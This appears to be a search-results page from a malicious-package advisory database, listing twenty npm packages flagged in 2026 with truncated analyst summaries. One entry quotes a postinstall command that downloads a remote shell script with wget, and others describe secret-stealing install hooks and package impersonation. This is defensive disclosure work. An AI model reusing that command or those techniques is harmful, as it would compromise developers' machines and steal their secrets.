241 matches found
MAL-2026-10558 Malicious code in akshajrawat.utils (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 105157af41712b64f8b36ec1cb01e28958e4ad828a0c08d0979a1f6e22d1f13d The package's package.json declares a postinstall lifecycle hook that runs automatically on npm install: node -e...
Malicious code in abuden215 (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 895382f96e91ecd3b6a78cac09b905becc2692fef044eacd9ce4d5cb18327b5f The tarball ships auto-publish.sh, a script that republishes the same payload under 100 distinct npm names ishowfeet1-ishowfeet20, nottuff1-nottuff30...
Malicious code in backupgenuine-updated (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 163e55285112106141566338db7483490b20567a431458b4b921a71534135ce0 Package published as [email protected] with description "Republished package" actually contains a Vite-built single-page application titled...
MAL-2026-6594 Malicious code in vkzmn (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector dc2e10775ac70e6f3b083ac0a76374e09e11cac7b06068a4bd3b6114f796a0df package.json declares a postinstall lifecycle hook that runs wget https://codeberg.org/atilalogical/wormteste/raw/branch/main/downprocwork.sh -O d.sh...
MAL-2026-6284 Malicious code in new-helper (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 47f6e9bcab53d95265012a31a4dcfc1485ed6db858e788e68ac2ac1ebc33fc34 index.js imports childprocess and contains execSync calls invoking bash and zsh around lines 301 and 317. Without traced execution context, it is not...
MAL-2026-5688 Malicious code in ecto-nightly-spirit (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 5dea0702101217f4a918a23191023bbd9e7d3b5478028bb0868341a574526e97 On npm install, postinstall.js executes unconditionally and performs three installer-harming actions. 1 It enumerates every key/value pair in...
Malicious code in rate-limit-flexible (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 166436585b1666871717d2202a01b64cfc580432ad36d90fa05903daf050d8f7 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in nodemon-copack (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector ad79a82314fcc935b1dbdcb12ca1c413af27877e51058a02665471744f2bcd7a The package is published as 'nodemon-copack' but its package.json wholesale impersonates the legitimate nodemon project: homepage is set to...
MAL-2026-5186 Malicious code in autotel-terminal (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 47ab3c608b6bea332dc57224c5929d54d923655f3bd225ff30e25c3406b8a9a5 The package's bundled CLI files dist/cli.cjs and dist/cli.js contain co-occurring tokens 'ping' and 'POST' that triggered a network/command...
MAL-2026-5080 Malicious code in tailwind-clamps-line (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 091842cb2bfe94e715b2bfec88b04625ea3350097c037d2b172483905633c20e Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
MAL-2026-4280 Malicious code in node-setup-helpers (npm)
Ten packages published by npm user asdxzxc at version 1.0.10 target developers working on AI and LLM tooling. Each package masquerades as a developer utility while executing a two-stage payload triggered via postinstall: package.json → lib/setup.js → lib/worker.js. Credential harvesting:...
Malicious code in @uipath/agent-tool (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 1bf0a4aecf9abab564a34cce85bbd0992c11840dfce74518bc3f21d5fc4e47ad Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
MAL-2026-3463 Malicious code in @tanstack/history (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware d40d7bafa18dd8987c0ee75b8ffccfc7db076f4521961472d0830ef93a03994e Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in @kjma/mailcraft (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 69f8916db8f38815341618cd61534b177ef9984ab2dd5774e445bb072fcf10c6 The package @kjma/mailcraft was found to contain malicious code. Source: ghsa-malware 5e4802b882a28ccb6e1c4c9bf610c05c4a2a023d7018fb66c0ac46623b8560d...
Malicious code in pino-pretty-log (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector a2a9c035f47cbd6beb9e2f47299a689f13823a21eaef04fd6abfa9035dcb120e The package pino-pretty-log was found to contain malicious code. Source: ghsa-malware 5ddd0444ff8834bc42162fb1d88cf6d71f6044c2a636cde204484f654ce6589...
Malicious code in ember-power-calendar-utils (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 55191162c66f85fd90f4c2bb6354b569a7ab7cdc6a380289defcc8be784ed434 The package ember-power-calendar-utils was found to contain malicious code. Source: ghsa-malware...
Malicious code in big-numben (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 61c77ff6fcfee6f58a1a8a5a268bb6db596b9059b965e3bcfd58a88a197179e7 The package big-numben was found to contain malicious code. Source: ghsa-malware ae2b54e5805771f2bde8a32bc288306dc173a176a009f4309baf89672a9827fb Any...
MAL-2026-1554 Malicious code in typescript-validation-schema (npm)
The package 'typescript-validation-schema' is part of the PhantomRaven supply chain attack campaign Wave 2. It uses a Remote Dynamic Dependency RDD technique: the published package appears benign but includes a URL-based dependency in package.json pointing to an attacker-controlled C2 server...
Malicious code in dell-emc-internal-api-drzak (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 79b1c68a3106c50c73d1ede904d8c6fe7b41466a0e619e50c0935a7988293740 The package dell-emc-internal-api-drzak was found to contain malicious code. Source: ghsa-malware...
MAL-2026-1154 Malicious code in rullzdigital (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 4cc6a9ad8fc8b038ba42a8fc8e3175d9e519340d5fbb9f36c946d50495efe670 The package rullzdigital was found to contain malicious code. Source: ghsa-malware 661254fd70224e2719b2260797867b5d063b1928340696642f8b683b04473b06 A...